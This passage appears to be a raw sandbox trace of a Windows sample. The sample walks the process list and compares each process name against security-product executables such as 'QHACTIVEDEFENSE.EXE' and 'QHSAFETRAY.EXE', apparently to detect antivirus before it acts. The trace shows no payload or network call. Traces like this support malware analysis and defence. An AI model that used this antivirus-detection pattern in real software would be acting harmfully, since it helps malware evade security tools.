lpsz="TASKHOST.EXE") returned 0xc [0162.729] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.729] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0162.730] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0162.730] lstrlenW (lpString="taskeng.exe") returned 11 [0162.730] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0162.730] lstrcmpW (lpString1="TASKENG.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.730] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0162.730] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0162.730] lstrlenW (lpString="dwm.exe") returned 7 [0162.730] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0162.730] lstrcmpW (lpString1="DWM.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.731] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0162.731] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0162.731] lstrlenW (lpString="explorer.exe") returned 12 [0162.731] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc 
[0162.731] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.731] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0162.732] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0162.732] lstrlenW (lpString="taskeng.exe") returned 11 [0162.732] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0162.732] lstrcmpW (lpString1="TASKENG.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.732] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0162.733] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0162.733] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0162.733] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0162.733] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.733] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0162.733] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0162.733] lstrlenW (lpString="taskhost.exe") returned 12 [0162.733] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc 
[0162.734] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.734] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0162.734] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0162.734] lstrlenW (lpString="calls ccd copyright.exe") returned 23 [0162.734] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0162.734] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.734] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0162.735] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0162.735] lstrlenW (lpString="tri.exe") returned 7 [0162.735] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0162.735] lstrcmpW (lpString1="TRI.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.735] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0162.736] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0162.736] lstrlenW (lpString="navigation-jay.exe") returned 18 [0162.736] 
CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0162.736] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.736] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0162.737] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0162.737] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0162.737] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0162.737] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.737] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0162.741] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0162.741] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0162.741] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0162.741] lstrcmpW (lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.741] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, 
th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0162.741] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0162.741] lstrlenW (lpString="ship-loans.exe") returned 14 [0162.741] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0162.741] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.742] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0162.742] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0162.742] lstrlenW (lpString="isolation.exe") returned 13 [0162.742] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0162.742] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.742] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0162.743] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0162.743] lstrlenW (lpString="abc.exe") returned 7 [0162.743] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0162.743] lstrcmpW (lpString1="ABC.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.743] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, 
th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0162.744] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0162.744] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0162.744] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0162.744] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.744] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0162.744] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0162.745] lstrlenW (lpString="english_performing.exe") returned 22 [0162.745] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0162.745] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.745] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0162.745] lstrcpyW (in: lpString1=0x18f6dc, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0162.745] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0162.745] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: 
lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0162.745] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.745] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0162.746] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0162.746] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0162.746] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0162.746] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.746] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0162.747] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0162.747] lstrlenW (lpString="volume.exe") returned 10 [0162.747] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0162.747] lstrcmpW (lpString1="VOLUME.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.747] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich-zealand.exe")) returned 1 [0162.748] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0162.748] lstrlenW (lpString="rich-zealand.exe") 
returned 16 [0162.748] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0162.748] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.748] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0162.748] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0162.748] lstrlenW (lpString="objectives-bailey-audit.exe") returned 27 [0162.748] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0162.748] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.748] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0162.749] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0162.749] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0162.749] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0162.749] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.749] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0162.750] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0162.750] lstrlenW (lpString="sayconvenience.exe") returned 18 [0162.750] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0162.750] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.750] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="psychology-leaving-examinations.exe")) returned 1 [0162.754] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0162.754] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0162.754] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0162.754] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.754] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0162.755] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0162.755] lstrlenW (lpString="EXCEL.EXE") returned 9 [0162.755] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0162.755] lstrcmpW (lpString1="EXCEL.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.755] 
Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.755] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.755] lstrlenW (lpString="svchost.exe") returned 11 [0162.755] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.755] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.755] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0162.756] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0162.756] lstrlenW (lpString="sppsvc.exe") returned 10 [0162.756] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0162.756] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.756] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0162.757] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0162.757] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0162.757] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0162.757] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.757] Process32NextW (in: 
hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.758] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.758] lstrlenW (lpString="svchost.exe") returned 11 [0162.758] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.758] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.758] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.959] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0162.959] lstrlenW (lpString="svchost.exe") returned 11 [0162.959] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0162.959] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.959] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0162.959] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0162.959] lstrlenW (lpString="winpoint.exe") returned 12 [0162.960] CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0162.960] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned 1 [0162.960] Process32NextW (in: 
hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0162.960] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0162.960] lstrlenW (lpString="cmd.exe") returned 7 [0162.960] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0162.960] lstrcmpW (lpString1="CMD.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.960] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0162.961] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0162.961] lstrlenW (lpString="conhost.exe") returned 11 [0162.961] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0162.961] lstrcmpW (lpString1="CONHOST.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.961] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0162.962] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0162.962] lstrlenW (lpString="PING.EXE") returned 8 [0162.962] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0162.962] lstrcmpW (lpString1="PING.EXE", lpString2="QHACTIVEDEFENSE.EXE") returned -1 [0162.962] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0162.962] CloseHandle (hObject=0xe0) returned 1 [0162.962] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0162.968] lstrcpyW (in: lpString1=0x18f8e4, lpString2="QHSAFETRAY.EXE" | out: lpString1="QHSAFETRAY.EXE") returned="QHSAFETRAY.EXE" [0162.968] lstrlenW (lpString="QHSAFETRAY.EXE") returned 14 [0162.968] CharUpperBuffW (in: lpsz="QHSAFETRAY.EXE", cchLength=0xe | out: lpsz="QHSAFETRAY.EXE") returned 0xe [0162.968] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 